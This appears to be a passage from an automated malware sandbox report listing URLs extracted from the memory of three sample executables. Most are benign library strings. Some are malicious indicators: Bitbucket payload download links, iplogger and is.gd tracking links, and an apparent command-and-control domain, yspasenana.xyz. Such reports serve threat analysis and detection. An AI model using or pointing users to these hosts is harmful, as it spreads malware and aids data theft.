                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: 1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                      Source: 1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                      Source: 1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.385284106.0000000002B0B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
                      Source: Nb2HQZZDIf.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                      Source: 1234.exe, 0000000F.00000002.385785787.0000000002B7B000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484424033.00000000038B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: 1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: 1234.exe, 0000000F.00000002.385167858.0000000002ADC000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsti
                      Source: srvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: 1234.exe, 0000000F.00000002.386418247.0000000002C65000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                      Source: srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: 1234.exe, 0000000F.00000002.386246795.0000000002C39000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226713519.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 1234.exe, 00000002.00000003.218810935.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 1234.exe, 00000002.00000003.220817436.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html8
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 1234.exe, 00000002.00000003.220716049.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlyv
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.219879289.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/v-s
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersZ
                      Source: 1234.exe, 00000002.00000003.221158654.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersb
                      Source: 1234.exe, 00000002.00000003.219078395.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                      Source: 1234.exe, 00000002.00000003.219461418.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
                      Source: 1234.exe, 00000002.00000003.219508500.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerst
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: 1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: 1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
                      Source: 1234.exe, 00000002.00000003.221286981.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsF
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comap
                      Source: 1234.exe, 00000002.00000003.221615342.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
                      Source: 1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdTF
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdsed
                      Source: 1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226658468.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come.com
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                      Source: 1234.exe, 00000002.00000003.219345969.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comica
                      Source: 1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitum
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk:
                      Source: 1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como:
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv
                      Source: 1234.exe, 00000002.00000003.219078395.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueto3
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comy
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 1234.exe, 00000002.00000003.223065732.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                      Source: 1234.exe, 00000002.00000003.223065732.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/:
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: 1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
                      Source: 1234.exe, 00000002.00000003.216141867.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
                      Source: 1234.exe, 00000002.00000003.216400129.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/U
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                      Source: 1234.exe, 00000002.00000003.216270942.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
                      Source: 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cros
                      Source: 1234.exe, 00000002.00000003.216270942.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/crosU
                      Source: 1234.exe, 00000002.00000003.216218362.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
                      Source: 1234.exe, 00000002.00000003.216857497.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/U
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/b
                      Source: 1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/p
                      Source: 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
                      Source: 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rz
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 1234.exe, 00000002.00000003.218706456.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: 1234.exe, 00000002.00000003.218706456.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de2(
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 1234.exe, 00000002.00000003.221264276.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dea(
                      Source: 1234.exe, 00000002.00000003.221264276.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dera
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 1234.exe, 00000002.00000003.215590431.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cntS
                      Source: 1234.exe, 0000000F.00000002.385785787.0000000002B7B000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz
                      Source: 1234.exe, 0000000F.00000002.386246795.0000000002C39000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz(h
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz/
                      Source: 1234.exe, 0000000F.00000002.386040704.0000000002BF7000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz4
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz:80/
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                      Source: 1234.exe, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sbx
                      Source: 1234.exeString found in binary or memory: https://api.ipify.org
                      Source: srvs.exeString found in binary or memory: https://api.ipify.orgcookies//setti
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                      Source: Nb2HQZZDIf.exeString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/b~
                      Source: 1234.exe, 0000000F.00000002.385267737.0000000002B04000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/74c745b8-de86-
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/80e8feaa-7504-
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com4
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/1234.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/1234.exel:%
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/1234.exeu
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/6.exe
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org4
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: 1234.exe, 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: Nb2HQZZDIf.exeString found in binary or memory: https://iplogger.org/
                      Source: Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308831972.0000000140141000.00000040.00020000.sdmpString found in binary or memory: https://iplogger.org/1Bwjj7
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305082174.00000000008E8000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1Bwjj7%A_AppData%
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/
                      Source: Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp, Nb2HQZZDIf.exe, 00000000.00000002.308831972.0000000140141000.00000040.00020000.sdmpString found in binary or memory: https://is.gd/dg3E5g
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305082174.00000000008E8000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/dg3E5g%A_AppData%
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/dg3E5g7
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/dg3E5gA63
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/dg3E5gC
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/dg3E5gS6%
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpString found in binary or memory: https://is.gd/dg3E5g_6
                      Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385654345.0000000002B23000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484424033.00000000038B1000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484402616.00000000038AD000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
